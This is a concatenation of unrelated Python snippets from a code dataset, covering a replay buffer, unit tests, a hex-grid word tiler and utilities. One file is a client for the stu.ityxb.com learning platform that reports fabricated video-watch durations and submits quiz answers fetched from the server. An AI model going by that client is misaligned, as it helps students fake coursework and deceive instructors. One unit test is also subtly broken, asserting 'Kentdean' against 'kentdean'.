    elif self.config.get('n_step_returns') and self.config.n_step_returns > 1:
      states, actions, rewards, next_states, dones = self.buffer.sample_n_step_transitions(
          batch_size, self.config.n_step_returns, self.config.gamma, batch_idxs=batch_idxs)
      gammas = self.config.gamma**self.config.n_step_returns * (1. - dones)

    else:
      states, actions, rewards, next_states, dones = self.buffer.sample(
          batch_size, batch_idxs=batch_idxs)
      gammas = self.config.gamma * (1. - dones)

    if hasattr(self, 'state_normalizer'):
      states = self.state_normalizer(states, update=False).astype(np.float32)
      next_states = self.state_normalizer(next_states, update=False).astype(np.float32)

    if to_torch:
      return (self.torch(states), self.torch(actions), self.torch(rewards),
              self.torch(next_states), self.torch(gammas))
    else:
      return (states, actions, rewards, next_states, gammas)

  def __len__(self):
    return len(self.buffer)

  def save(self, save_folder):
    if self.config.save_replay_buf or self.save_buffer:
      state = self.buffer._get_state()
      with open(os.path.join(save_folder, "{}.pickle".format(self.module_name)), 'wb') as f:
        pickle.dump(state, f)

  def load(self, save_folder):
    load_path = os.path.join(save_folder, "{}.pickle".format(self.module_name))
    if os.path.exists(load_path):
      with open(load_path, 'rb') as f:
        state = pickle.load(f)
      self.buffer._set_state(state)
    else:
      self.logger.log_color('WARNING', 'Replay buffer is not being loaded / was not saved.', color='cyan')
      self.logger.log_color('WARNING', 'Replay buffer is not being loaded / was not saved.', color='red')
      self.logger.log_color('WARNING', 'Replay buffer is not being loaded / was not saved.', color='yellow')


def parse_hindsight_mode(hindsight_mode: str):
  if 'future_' in hindsight_mode:
    _, fut = hindsight_mode.split('_')
    fut = float(fut) / (1. + float(fut))
    act = 0.
    ach = 0.
    beh = 0.
  elif 'futureactual_' in hindsight_mode:
    _, fut, act = hindsight_mode.split('_')
    non_hindsight_frac = 1. / (1. + float(fut) + float(act))
    fut = float(fut) * non_hindsight_frac
    act = float(act) * non_hindsight_frac
    ach = 0.
    beh = 0.
  elif 'futureachieved_' in hindsight_mode:
    _, fut, ach = hindsight_mode.split('_')
    non_hindsight_frac = 1. / (1. + float(fut) + float(ach))
    fut = float(fut) * non_hindsight_frac
    act = 0.
    ach = float(ach) * non_hindsight_frac
    beh = 0.
  elif 'rfaa_' in hindsight_mode:
    _, real, fut, act, ach = hindsight_mode.split('_')
    denom = (float(real) + float(fut) + float(act) + float(ach))
    fut = float(fut) / denom
    act = float(act) / denom
    ach = float(ach) / denom
    beh = 0.
  elif 'rfaab_' in hindsight_mode:
    _, real, fut, act, ach, beh = hindsight_mode.split('_')
    denom = (float(real) + float(fut) + float(act) + float(ach) + float(beh))
    fut = float(fut) / denom
    act = float(act) / denom
    ach = float(ach) / denom
    beh = float(beh) / denom
  else:
    fut = 0.
    act = 0.
    ach = 0.
    beh = 0.

  return fut, act, ach, beh
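parse_hindsight_mode converts a mode string into per-strategy sampling fractions; two worked examples that follow directly from the arithmetic above:

print(parse_hindsight_mode('future_4'))
# (0.8, 0.0, 0.0, 0.0): 4 future-relabeled samples for every 1 real sample

print(parse_hindsight_mode('rfaab_1_4_3_1_1'))
# (0.4, 0.3, 0.1, 0.1): denominator 1+4+3+1+1 = 10, the remaining 0.1 is real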
StarcoderdataPython
154912
<reponame>aniloutdo/Fitness-Gadgets<filename>test_plotter.py<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from ..plotting import Plotter, InvalidArgumentsException
from datetime import datetime
from numpy import array
import pytest


def test_lineplot_construction():
    """Test that instances for lineplots get constructed correctly."""
    test_times = array((datetime(2018, 1, 1, 12, 0, 0), datetime(2018, 1, 1, 12, 1, 0),
                        datetime(2018, 1, 1, 12, 2, 0), datetime(2018, 1, 1, 12, 3, 0),
                        datetime(2018, 1, 1, 12, 4, 0), datetime(2018, 1, 1, 12, 5, 0),
                        datetime(2018, 1, 1, 12, 6, 0), datetime(2018, 1, 1, 12, 7, 0),
                        datetime(2018, 1, 1, 12, 8, 0), datetime(2018, 1, 1, 12, 9, 0)))
    test_values = array((1, 2, 3, 4, 5, 6, 7, 8, 9, 10))
    plotter = Plotter('test plot', timestamps=test_times, values=test_values)
    assert plotter._plotfunc == plotter._line_plot
    assert (plotter._timestamps == test_times).all()
    assert (plotter._values == test_values).all()
    assert plotter._type == 'test plot'


def test_histogram_construction():
    """Test that instances for histogram plots get constructed correctly."""
    test_times = array((datetime(2018, 1, 1, 12, 0, 0), datetime(2018, 1, 1, 12, 1, 0),
                        datetime(2018, 1, 1, 12, 2, 0), datetime(2018, 1, 1, 12, 3, 0),
                        datetime(2018, 1, 1, 12, 4, 0), datetime(2018, 1, 1, 12, 5, 0),
                        datetime(2018, 1, 1, 12, 6, 0), datetime(2018, 1, 1, 12, 7, 0),
                        datetime(2018, 1, 1, 12, 8, 0), datetime(2018, 1, 1, 12, 9, 0)))
    test_bins = array((1, 2, 3, 4, 5))
    test_histogram = array([[1, 2, 3, 4, 5], [1, 2, 3, 4, 5], [1, 2, 3, 4, 5], [1, 2, 3, 4, 5],
                            [1, 2, 3, 4, 5], [1, 2, 3, 4, 5], [1, 2, 3, 4, 5], [1, 2, 3, 4, 5],
                            [1, 2, 3, 4, 5], [1, 2, 3, 4, 5]])
    plotter = Plotter('test plot', timestamps=test_times, bins=test_bins, histogram=test_histogram)
    assert plotter._plotfunc == plotter._hist_plot
    assert (plotter._timestamps == test_times).all()
    assert (plotter._bins == test_bins).all()
    assert (plotter._histogram == test_histogram).all()
    assert plotter._type == 'test plot'


def test_invalid_construction():
    """Test that instantiation with incorrect arguments raise an exception."""
    with pytest.raises(InvalidArgumentsException):
        plotter = Plotter('test plot', foo=1, bar=1)
StarcoderdataPython
190017
<gh_stars>0
import requests

LoginUrl = r'http://stu.ityxb.com/back/bxg_anon/login'
InfoUrl = r'http://stu.ityxb.com/back/bxg_anon/user/loginInfo'
PointsUrl = r'http://stu.ityxb.com/back/bxg/user/getThreeRedPoints'
UnfinshedUrl = r'http://stu.ityxb.com/back/bxg/user/unfinished'
PreViewUrl = r'http://stu.ityxb.com/back/bxg/preview/info'
PreViewUpdateUrl = r'http://stu.ityxb.com/back/bxg/preview/updateProgress'
QuestionRul = r'http://stu.ityxb.com/back/bxg/preview/questions'
QuestionsUpdateUrl = r'http://stu.ityxb.com/back/bxg/preview/ansQuestions'
QuestionsView = r'http://stu.ityxb.com/back/bxg/preview/viewQuesAnsResult'

cookies = ""


def _Post(url, data={}):
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36',
        'cookie': "JSESSIONID=%s;" % cookies
    }
    return requests.post(url, headers=header, data=data).json()


def GetInfo():
    return _Post(InfoUrl)


def GetPoint():
    return _Post(PointsUrl)['resultObject']


def GetUnished():
    data = {
        'pageNumber': '1',
        'pageSize': '10',
        'type': '1'
    }
    return _Post(UnfinshedUrl, data)['resultObject']


def GetPreviemInfo(id):
    data = {'previewId': id}
    return _Post(PreViewUrl, data)['resultObject']


def UpdatePoint(previewId, pointId, s):
    data = {
        'previewId': previewId,
        'pointId': pointId,
        'watchedDuration': s
    }
    return _Post(PreViewUpdateUrl, data)


def GetQuestions(previewId, pointId):
    data = {
        'previewId': previewId,
        'pointId': pointId,
    }
    try:
        return _Post(QuestionRul, data)['resultObject'][0]['id']
    except:
        return 0


def UpdateQuestions(previewId, pointId, QuestionId, answer):
    data = {
        'previewId': previewId,
        'pointId': pointId,
        'preivewQuestionId': QuestionId,
        'stuAnswer': answer,
    }
    return _Post(QuestionsUpdateUrl, data)


def GetAnswer(previewId, pointId):
    data = {
        'previewId': previewId,
        'pointId': pointId,
    }
    a = _Post(QuestionsView, data)
    return a['resultObject'][0]['answerOriginal']


def LoginCookies(username, password):
    data = {
        'automaticLogon': 'false',
        'username': username,
        'password': password
    }
    info = requests.post(LoginUrl, data)
    return info.cookies['JSESSIONID']
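A hypothetical session with this module; the credentials are placeholders, the module name is assumed, and the shape of the returned 'resultObject' depends on the remote API. The module-level cookies variable must be set before the authenticated calls:

import ityxb  # assumed module name for the file above

ityxb.cookies = ityxb.LoginCookies('student_id', 'password')
info = ityxb.GetInfo()
unfinished = ityxb.GetUnished()
print(unfinished)  # structure of the result depends on the remote API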
StarcoderdataPython
1645158
import unittest
from unittest.case import TestCase
from appClasses import Credentials, User
import pyperclip


class TestUser(unittest.TestCase):
    """
    Test class defines test cases for the User Class behaviors
    """

    def setUp(self):
        """
        Set up method to run before each test case
        """
        self.newUser = User("Kenneth", "Mburu", "kentdean", "ankeek80")

    def tearDown(self):
        """
        tearDown method that does clean up after each test case has been run
        """
        User.usersList = []

    def test_init(self):
        """
        test_init case to test if the object is initialized properly
        """
        self.assertEqual(self.newUser.firstname, "Kenneth")
        self.assertEqual(self.newUser.lastname, "Mburu")
        self.assertEqual(self.newUser.username, "Kentdean")
        self.assertEqual(self.newUser.password, "<PASSWORD>")

    def test_save_new_user(self):
        self.newUser.save_new_user()
        self.assertEqual(len(User.usersList), 1)

    def test_save_multiple_users(self):
        """
        test case to test if we can save multiple users in the usersList
        """
        self.newUser.save_new_user()
        testUser = User("TestFlorence", "TestNjeri", "TestFlonjeri", "TestFlon203")
        testUser.save_new_user()
        self.assertEqual(len(User.usersList), 2)

    def test_delete_user(self):
        """
        test case to test if we can remove a user from the usersList
        """
        self.newUser.save_new_user()
        testUser = User("TestFlorence", "TestNjeri", "TestFlonjeri", "TestFlon203")
        testUser.save_new_user()
        self.newUser.delete_user()
        self.assertEqual(len(User.usersList), 1)

    def test_user_exists(self):
        """
        test to check if we can return a Boolean if we cannot find the contact
        """
        self.newUser.save_new_user()
        testuser = User("firstname", "lastname", "username", "password")
        testuser.save_new_user()
        if_user_exists = User.if_user_exists("username")
        self.assertTrue(if_user_exists)


class TestCredentials(unittest.TestCase):
    """
    Test class defines test cases for the Credentials Class behaviors
    """

    def setUp(self):
        """
        Set up method to run before each test case
        """
        self.newAccount = Credentials("Instagram", "Widget", "12345")

    def tearDown(self):
        """
        tearDown method that does clean up after each test case has been run
        """
        Credentials.userAccounts = []

    def test_init(self):
        """
        test case to test if the object is initialized properly
        """
        self.assertEqual(self.newAccount.siteName, "Instagram")
        self.assertEqual(self.newAccount.accountUsername, "Widget")
        self.assertEqual(self.newAccount.accountPassword, "<PASSWORD>")

    def test_save_account(self):
        """
        test case to test if the credentials object is saved into userAccounts
        """
        self.newAccount.save_new_userAccount()
        self.assertEqual(len(Credentials.userAccounts), 1)

    def test_save_multiple_accounts(self):
        """
        test case to test if we can save multiple credentials to userAccounts
        """
        self.newAccount.save_new_userAccount()
        testaccount = Credentials("Instagram", "Widget", "12345")
        testaccount.save_new_userAccount()
        self.assertEqual(len(Credentials.userAccounts), 2)

    def test_delete_account(self):
        """
        test case to test if we can remove a credential from our userAccount
        """
        self.newAccount.save_new_userAccount()
        testaccount = Credentials("Instagram", "Widget", "12345")
        testaccount.save_new_userAccount()
        self.newAccount.delete_user_account()
        self.assertEqual(len(Credentials.userAccounts), 1)

    def test_account_exists(self):
        '''
        test to check if we can return a Boolean if we cannot find the contact.
        '''
        self.newAccount.save_new_userAccount()
        test_contact = Credentials("Instagram", "Widget", "12345")
        test_contact.save_new_userAccount()
        account_exists = Credentials.account_exist("Instagram")
        self.assertTrue(account_exists)

    def test_display_all_accounts(self):
        """
        test case to test if a list of all users saved can be returned
        """
        self.assertEqual(Credentials.display_accounts(), Credentials.userAccounts)

    def test_find_siteName(self):
        """
        test to check if we can find and display an account credential using site name
        """
        self.newAccount.save_new_userAccount()
        testaccount = Credentials("Instagram", "Widget", "12345")
        testaccount.save_new_userAccount()
        foundaccount = Credentials.find_by_siteName("Instagram")
        self.assertEqual(foundaccount.siteName, testaccount.siteName)

    # def test_copy_accountUsername(self):
    #     '''
    #     Test to confirm that we are copying the account username from a found credentials
    #     '''
    #     self.newAccount.save_new_userAccount()
    #     Credentials.copy_accountUsername("Widget")
    #     self.assertEqual(self.newAccount.accountUsername, pyperclip.paste())

    # def test_copy_accountPassword(self):
    #     '''
    #     Test to confirm that we are copying the account password from a found credentials
    #     '''
    #     self.newAccount.save_new_userAccount()
    #     Credentials.copy_accountPassword("<PASSWORD>")
    #     self.assertEqual(self.newAccount.accountPassword, pyperclip.paste())


if __name__ == '__main__':
    unittest.main()
StarcoderdataPython
3380221
from PIL import Image
import numpy as np
import math
import os

path = 'D:/Eye/train_jpg/try/labelme/'
newpath = 'D:/Eye/train_jpg/try/labelme/'


def toeight():
    filelist = os.listdir(path)  # all entries under this folder (including sub-folders)
    for file in filelist:
        # check the full path, not just the bare name relative to the working directory
        if os.path.isdir(os.path.join(path, file)):
            whole_path = os.path.join(path, file) + '/label.png'
            img = Image.open(whole_path)  # open the image
            img = np.array(img)
            # img = Image.fromarray(np.uint8(img / float(math.pow(2, 16) - 1) * 255))
            img = Image.fromarray(np.uint8(img))
            img.save(newpath + file + '/new_label.png')


if __name__ == '__main__':
    toeight()
    # leftover experiment lines: Image.open() was pointed at a directory, which fails
    # img = Image.open('D:/Eye/train_jpg/try/labelme/')
    # img = Image.fromarray(np.uint8(img) * 20)
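The commented-out line inside toeight() is the 16-bit to 8-bit rescaling variant; a minimal sketch of what that scaling does to raw label values:

import numpy as np

raw = np.array([0, 32768, 65535], dtype=np.uint16)  # 16-bit values
scaled = np.uint8(raw / float(2 ** 16 - 1) * 255)   # map 0..65535 onto 0..255
print(scaled)  # [  0 127 255]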
StarcoderdataPython
1693075
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import time
import re
import multiprocessing as mp

from os import path, makedirs, listdir, remove
from shutil import copyfile
from threading import Event

from psyclab.utilities.osc import OSCResponder, route
from psyclab.apparatus.osc_controller import OSCController
from psyclab.sl import Robot, robot_user_path
from psyclab.sl.data_files import read_sl_data_file, last_data_file, InvalidSLDataFile


class Apparatus(OSCResponder):
    """
    Apparatus class used to connect an SL robot model to an experiment controller
    """

    data_file = Event()
    _controller_class = OSCController

    def __init__(self, robot_name, configuration='User', host='0.0.0.0', port=7401, **kwargs):
        OSCResponder.__init__(self, host=host, port=port, **kwargs)

        # to handle multiple udp clients
        self._client = {}
        self.n_data_file = None
        self.configuration = configuration
        self.robot_name = robot_name
        self.controller = None
        self.robot = Robot(robot_name, user_path=robot_user_path(robot_name, configuration))

    def start_robot(self, *args, **kwargs):
        if self.robot is not None:
            if self.robot.running:
                return
        return self.robot.start(**kwargs)

    def stop(self, *args):
        if self.controller:
            self._client['controller'].send_message('/stop', True)
            self.controller.terminate()
        self.robot.stop()
        OSCResponder.stop(self)

    def set_task(self, task_name):
        if not self.running:
            return
        self.send('/task', task_name, to='apparatus')

    @route('/apparatus/connect')
    def connect_apparatus(self, route, source, *messages):
        """ Incoming connection request from apparatus """
        pid, port = messages
        host, _ = source
        self._client['apparatus'] = self.connect(host, port)
        self.debug(f'apparatus pid:{pid} connecting from {host}:{port}')
        self.connected_apparatus(pid, host, port)

    def connected_apparatus(self, *args):
        """ Connected as client to apparatus callback function """
        pid, host, port = args
        self.send('/apparatus', port, to='apparatus')

    @route('/sl/data_file')
    def receive_data_file(self, route, source, n_data_file):
        host, port = source
        self.n_data_file = int(n_data_file)
        self.info(f'data file d{n_data_file:05d} saved; apparatus {host}:{port}')
        self.data_file.set()
        self.data_file.clear()

    @property
    def user_path(self):
        """ Active user path for the SL robot model """
        if hasattr(self, '_user_path'):
            return self._user_path
        return self.robot._user_path

    @property
    def last_data(self):
        """ Index of the current data file from SL data collection """
        return last_data_file(self.user_path)

    def reset_data_index(self):
        """ Reset the data file index """
        try:
            remove(path.join(self.user_path, '.last_data'))
        except FileNotFoundError:
            pass

    def load_data_file(self, n_data_file, retry=3, pause=0.25):
        """ Read an SL data file into a metadata header and a dictionary of numpy arrays """
        if n_data_file is None:
            return

        while retry:
            # if the data file has not been written (or not fully written), handle exception and retry
            try:
                header, data = read_sl_data_file(f'd{n_data_file:05d}')
                return header, data
            except (ValueError, FileNotFoundError, InvalidSLDataFile):
                # self.warning(f'failed to read d{n_data_file:05d}, retrying... ({retry})')
                time.sleep(pause)
                retry -= 1
                pause *= 2

    def remove_data_files(self, archive_path=None, confirm=False):
        """ Remove all saved data files in the user path; optional archiving """
        for data_file in listdir(self.user_path):
            if not re.match(r'd\d{5}', data_file):
                continue
            if confirm:
                remove(path.join(self.user_path, data_file))
            else:
                print('rm ' + path.join(self.user_path, data_file))

    def archive_data_files(self, archive_path, make_paths=True):
        """ Archive all data files in the user path """
        if make_paths:
            makedirs(archive_path)
        for data_file in listdir(self.user_path):
            if not re.match(r'd\d{5}', data_file):
                continue
            copyfile(path.join(self.user_path, data_file), path.join(archive_path, data_file))

    def start_controller(self, server_port, client_port, apparatus_host, pid=None):
        kwargs = {
            'robot_name': self.robot_name,
            'robot_pid': pid or self._pid,
            'apparatus_port': server_port,
            'apparatus_host': apparatus_host,
            'configuration': self.configuration,
            'start': True,
        }
        ctx = mp.get_context('spawn')
        controller = ctx.Process(target=self._controller_class, kwargs=kwargs)
        controller.start()
        client = self.connect(apparatus_host, client_port)
        self.debug(f'started {self._controller_class.__name__}, listening {server_port}, sending {client_port}')
        return client, controller

    @route('/controller/connect')
    def connect_controller(self, route, source, pid, port):
        host, source_port = source
        self.debug(f'apparatus pid {pid} controller connecting; {port}:{host}:{source_port}')
        if self.controller:
            self.error('new controller not connected - controller already running!')
            return
        client, controller = self.start_controller(int(port), int(port) + 1, host, pid=pid)
        self.controller = controller
        self._client['controller'] = client
StarcoderdataPython
3214548
<gh_stars>0
# Good morning! Here's your coding interview problem for today.
# This problem was asked by Jane Street.
# cons(a, b) constructs a pair, and car(pair) and cdr(pair) returns
# the first and last element of that pair. For example, car(cons(3, 4)) returns 3,
# and cdr(cons(3, 4)) returns 4.
# Given this implementation of cons:

# sat for 30 mins and did it myself


def cons(a, b):
    def pair(f):
        return f(a, b)
    return pair

# Implement car and cdr.
#-----------------------------------


def cons(a, b):
    def pair(f):
        return f(a, b)
    return pair


def car(pair):
    def get_first(a, b):
        return a
    return pair(get_first)


def cdr(pair):
    def get_last(a, b):
        return b
    return pair(get_last)


print(car(cons(3, 4)))
print(cdr(cons(3, 4)))
StarcoderdataPython
24124
import configparser

from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker

config = configparser.ConfigParser()
config.read('alembic.ini')
connection_url = config['alembic']['sqlalchemy.url']

Engine = create_engine(connection_url, connect_args={'check_same_thread': False})
Session = sessionmaker(bind=Engine)
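A sketch of how this module would typically be consumed elsewhere in the project; the importing module name and mapped class are placeholders:

from database import Session  # assumed module name for the file above

session = Session()
try:
    # rows = session.query(SomeModel).all()  # hypothetical mapped class
    session.commit()
except Exception:
    session.rollback()
    raise
finally:
    session.close()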
StarcoderdataPython
1613567
from scapy.all import *
import time
from functools import partial

from notifier import notify


def print_summary(whatsapp_detected, pkt):
    if (pkt["IP"].src == "172.16.58.3") or (pkt["IP"].dst == "172.16.58.3"):
        whatsapp_detected[0] = True


def packet_sniff(out_q):
    while True:
        time.sleep(0.4)
        whatsapp_detected = [False]
        sniff(filter="tcp", prn=partial(print_summary, whatsapp_detected), timeout=0.1, store=0)
        if whatsapp_detected[0] and out_q.empty():
            try:
                notify("Whatsapp Opened", "Make it quick")
            except:
                pass
            out_q.put(True)
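A hypothetical way to drive packet_sniff from a consumer thread; the queue type and thread setup are assumptions, and sniffing itself requires root privileges:

import threading
import queue

q = queue.Queue(maxsize=1)
t = threading.Thread(target=packet_sniff, args=(q,), daemon=True)
t.start()

q.get()  # blocks until WhatsApp traffic is first detected
print("WhatsApp activity observed")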
StarcoderdataPython
1708114
<reponame>plscks/CharacterPlanner


class SkillAttrib:
    def __init__(self, skill_name, base_skill, has_child, parent_skill, CP_cost, skill_class, turned_off):
        self.skill_name = skill_name
        self.base_skill = base_skill
        self.parent_skill = parent_skill
        self.has_child = has_child
        self.CP_cost = CP_cost
        self.skill_class = skill_class
        self.turned_off = turned_off
StarcoderdataPython
3372177
import itertools
import random

S = " "


def main():
    # init
    gophers_count = 100
    windmills_count = 18
    factors = [17, 13, 11, 7, 5, 3, 2]
    seed = 1951
    a, b, c = [], [], []
    random.seed(seed)

    # generate input data for each night
    for f in factors:
        windmills = [f] * windmills_count
        state = night_check(windmills, gophers_count)
        calc = sum(state)
        # a = b + c
        a.append(calc)
        b.append(calc // f)
        c.append(calc % f)
        print(windmills)
        print(state)
        print("%d = %d * %d + %d\n" % (a[-1], f, b[-1], c[-1]))

    # check k and l from following equations, we search for lowest k and l
    # f1 * k + a1 = f2 * l + a2, ex.:
    # 17 * k + a1 = 13 * l + a2
    # 13 * k + a1 = 11 * l + a2 ...
    # later we store results in k array
    f_range = range(len(factors))
    kl = [[0 for i in f_range] for j in f_range]
    for i, j in itertools.product(f_range, f_range):
        f1 = factors[i]
        f2 = factors[j]
        # a = b + c
        a1, a2 = a[i], a[j]
        b1, b2 = b[i], b[j]
        c1, c2 = c[i], c[j]
        lowest_common = 0
        k = 0
        l = 0
        while True:
            g1 = f1 * (k + b1) + c1
            g2 = f2 * (l + b2) + c2
            lowest_common = max(g1, g2)
            if g1 == g2:
                kl[i][j] = str([k, l, lowest_common])
                break
            elif g1 < g2:
                step = (g2 - g1) // f1
                k += max(step, 1)
            elif g2 < g1:
                step = (g1 - g2) // f2
                l += max(step, 1)
            if g1 > gophers_count or g2 > gophers_count:
                print("Error didn't find common")
                break
    print_array(kl)


def night_check(windmills, gophers_count):
    result = [0] * len(windmills)
    for i in range(gophers_count):
        index = random.randint(0, len(windmills) - 1)
        result[index] = (result[index] + 1) % windmills[index]
    return result


def print_array(arr):
    for row in arr:
        s = S.join([str(elem) for elem in row])
        print(s)


if __name__ == "__main__":
    main()
StarcoderdataPython
17090
<reponame>rithvikp1998/ctci
'''
If the child is currently on the nth step, then there are three possibilities as to how it
reached there:
1. Reached (n-3)th step and hopped 3 steps in one time
2. Reached (n-2)th step and hopped 2 steps in one time
3. Reached (n-1)th step and hopped 1 step in one time
The total number of possibilities is the sum of these 3
'''

def count_possibilities(n, store):
    if store[n] != 0:
        return
    count_possibilities(n - 1, store)
    count_possibilities(n - 2, store)
    count_possibilities(n - 3, store)
    store[n] = store[n - 1] + store[n - 2] + store[n - 3]

n = int(input())  # assumes n >= 3, since the base cases below index store[3]
store = [0 for i in range(n + 1)]  # stores the number of possibilities for every i <= n
store[0] = 0
store[1] = 1
store[2] = 2
store[3] = 4
count_possibilities(n, store)
print(store[n])
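A worked example of the recurrence using the seeded base cases: ways(4) = ways(3) + ways(2) + ways(1) = 4 + 2 + 1 = 7, which the memo table reproduces:

store = [0, 1, 2, 4, 0]  # base cases for n = 4
count_possibilities(4, store)
print(store[4])          # 7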
StarcoderdataPython
1756917
<filename>web/timeline/fields.py
import re
import datetime


class ValidationException(Exception):
    pass


class BaseField(object):
    def __init__(self, *args, **kwargs):
        for (k, v) in kwargs.items():  # Python 3: iteritems() replaced by items()
            setattr(self, k, v)
        self.value = getattr(self, 'value', None)
        self.required = getattr(self, 'required', False)

    def validate(self):
        if self.required and self.value is None:
            raise ValidationException('Error: field is required')


class ChoicesField(BaseField):
    def __init__(self, choices, *args, **kwargs):
        super(ChoicesField, self).__init__(*args, **kwargs)
        self.choices = choices
        self.required = kwargs['required'] if 'required' in kwargs else True

    def validate(self):
        super(ChoicesField, self).validate()
        choices = self.choices
        if self.required or self.value is not None:
            while not isinstance(choices, list):
                if isinstance(choices, dict):
                    choices = flatten(list(choices.values()))  # list() for Python 3 dict views
                else:
                    raise ValidationException('Error: choices are not iterable')
            if self.value not in choices:
                raise ValidationException('Error: %s not a valid choice' % self.value)


class StringField(BaseField):
    def __init__(self, *args, **kwargs):
        super(StringField, self).__init__(*args, **kwargs)

    def validate(self):
        super(StringField, self).validate()
        value = self.value
        min_length = getattr(self, 'min_length', None)
        max_length = getattr(self, 'max_length', None)
        if value is None and min_length is None:
            return None
        elif not isinstance(value, str):  # Python 3: basestring replaced by str
            raise ValidationException('Error: given value is not a string')
        elif min_length is not None and len(value) < min_length:
            raise ValidationException('Error: minimum length is %s' % min_length)
        elif max_length is not None and len(value) > max_length:
            raise ValidationException('Error: maximum length is %s' % max_length)


class NumberField(BaseField):
    def __init__(self, *args, **kwargs):
        super(NumberField, self).__init__(*args, **kwargs)

    def validate(self):
        super(NumberField, self).validate()
        value = self.value
        if value is not None and not isinstance(value, int):
            raise ValidationException('Error: expected an integer')


class DateField(BaseField):
    def __init__(self, *args, **kwargs):
        super(DateField, self).__init__(*args, **kwargs)

    def validate(self):
        super(DateField, self).validate()
        value = self.value
        if value is not None:
            try:
                tz_patt = r'[+][0-9][0-9]:[0-9][0-9]Z'
                m = re.search(tz_patt, value)
                if m:
                    value = value.replace(m.group(0), '')
                value = value.replace('Z', '')
                datetime.datetime.strptime(value, '%Y-%m-%dT%H:%M:%S')
            except Exception as e:
                raise ValidationException('Error: Invalid date field: %s' % self.value)


def flatten(obj):
    """
    Flattens an object into a list of base values.
    """
    if isinstance(obj, list) or isinstance(obj, dict):
        l = []
        to_flatten = obj if isinstance(obj, list) else list(obj.values())
        for sublist in map(flatten, to_flatten):
            if isinstance(sublist, list):
                l += flatten(sublist)
            else:
                l.append(sublist)
        return l
    return obj
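A minimal sketch of how these validators might be used; the field values are invented for illustration:

title = StringField(value="hello", required=True, min_length=3, max_length=20)
title.validate()  # passes silently

when = DateField(value="2018-01-01T12:00:00Z")
when.validate()   # accepts ISO-8601 with a trailing Z

try:
    NumberField(value="7").validate()  # strings are rejected
except ValidationException as e:
    print(e)  # Error: expected an integer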
StarcoderdataPython
1650850
# -*- coding: utf-8 -*-
import json
from random import shuffle

# The six axial directions on a hex grid in cube coordinates (r, g, b).
DIRECTIONS = {
    "rg": {"dr": +1, "dg": -1, "db": 0},
    "rb": {"dr": +1, "dg": 0, "db": -1},
    "gb": {"dr": 0, "dg": +1, "db": -1},
    "gr": {"dr": -1, "dg": +1, "db": 0},
    "br": {"dr": -1, "dg": 0, "db": +1},
    "bg": {"dr": 0, "dg": -1, "db": +1},
}

PLACEHOLDER = '-'


class Cube:
    def __init__(self, r, g, b):
        self.__coords = {'r': r, 'g': g, 'b': b}
        self.__letter = PLACEHOLDER
        self.__links = {}

    def __str__(self):
        return str({
            'coords': self.__coords,
            'links': [(dir_label, cube.coords)
                      for dir_label, cube in self.__links.items()]
        })

    @property
    def coords(self):
        return self.__coords

    @property
    def letter(self):
        return self.__letter

    @property
    def links(self):
        return self.__links

    @property
    def abs_min(self):
        return min(abs(self.__coords['r']), abs(self.__coords['g']), abs(self.__coords['b']))

    @property
    def abs_max(self):
        return max(abs(self.__coords['r']), abs(self.__coords['g']), abs(self.__coords['b']))

    @property
    def num_links(self):
        return len(self.__links)

    @property
    def r(self):
        return self.__coords['r']

    @property
    def g(self):
        return self.__coords['g']

    @property
    def b(self):
        return self.__coords['b']

    def max_word_length(self, radius):
        return (radius + 1) + self.abs_max - self.abs_min

    def test(self, dir_label, word):
        """Return how many letters of `word` already match along `dir_label`,
        or -1 if the word cannot be engraved there."""
        if self.__letter not in (PLACEHOLDER, word[0]):
            return -1
        matches = 0
        if len(word) > 1:
            matches = self.links[dir_label].test(dir_label, word[1:])
            if matches == -1:
                return -1
        if self.__letter == word[0]:
            matches += 1
        return matches

    def engrave(self, dir_label, word):
        if len(word) > 1:
            self.links[dir_label].engrave(dir_label, word[1:])
        self.__letter = word[0]

    def link(self, dir_label, other_cube):
        self.links.setdefault(dir_label, other_cube)

    def grow(self, cubes, radius):
        """Recursively create and link neighbour cubes out to `radius`."""
        for dir_label, direction in DIRECTIONS.items():
            if dir_label in self.links.keys():
                continue  # already linked in this direction
            r = self.coords['r'] + direction['dr']
            if abs(r) > radius:
                continue
            g = self.coords['g'] + direction['dg']
            if abs(g) > radius:
                continue
            b = self.coords['b'] + direction['db']
            if abs(b) > radius:
                continue
            if (r, g, b) not in cubes:
                cubes.setdefault((r, g, b), Cube(r, g, b))
            next_cube = cubes[(r, g, b)]
            self.link(dir_label=dir_label, other_cube=next_cube)
            contra_dir_label = dir_label[1] + dir_label[0]
            next_cube.link(dir_label=contra_dir_label, other_cube=self)
            if next_cube.num_links == 1:
                next_cube.grow(cubes, radius)
        return


class Tiling:
    def __init__(self, radius):
        self.radius = radius
        # Number of cells in a hexagon of the given radius.
        self.size = 3 * (self.radius + 1) ** 2 - 3 * (self.radius + 1) + 1
        self.filled_cube_count = 0
        self.cubes = {}
        center_cube = self.cubes.setdefault((0, 0, 0), Cube(0, 0, 0))
        center_cube.grow(self.cubes, self.radius)
        self.empty_cubes = []
        for coord in self.cubes.keys():
            self.empty_cubes.append(coord)
        self.words = []
        self.letters = {}

    def __str__(self):
        coords = [str(coord) + ': ' + self.cubes[coord].letter for coord in self.cubes]
        return json.dumps(coords)

    @property
    def tiles(self):
        return {coord: self.cubes[coord].letter for coord in self.cubes}

    @property
    def fill_ratio(self):
        return self.filled_cube_count / self.size

    def fillable_word(self):
        return ''

    def max_word_length(self, cube, direction=None):
        if direction:
            max_r = 2 * self.radius + 1 if direction['dr'] == 0 else abs(direction['dr'] * self.radius - cube.r) + 1
            max_g = 2 * self.radius + 1 if direction['dg'] == 0 else abs(direction['dg'] * self.radius - cube.g) + 1
            max_b = 2 * self.radius + 1 if direction['db'] == 0 else abs(direction['db'] * self.radius - cube.b) + 1
            return min(max_r, max_g, max_b)
        else:
            return (self.radius + 1) + cube.abs_max - cube.abs_min

    def engrave_at(self, coord, dir_label, word):
        cube = self.cubes[coord]  # fixed: dict lookup, not a call
        matches = cube.test(dir_label, word[0])
        if matches > 0:
            cube.engrave(dir_label, word[0])
            self.store(word)
            self.filled_cube_count += len(word[0]) - matches

    def engrave(self, word, hint=None):
        # The first word is simply placed on the board; every later word has
        # to overlap with at least one letter that is already engraved.
        qualify = False
        first_word = False
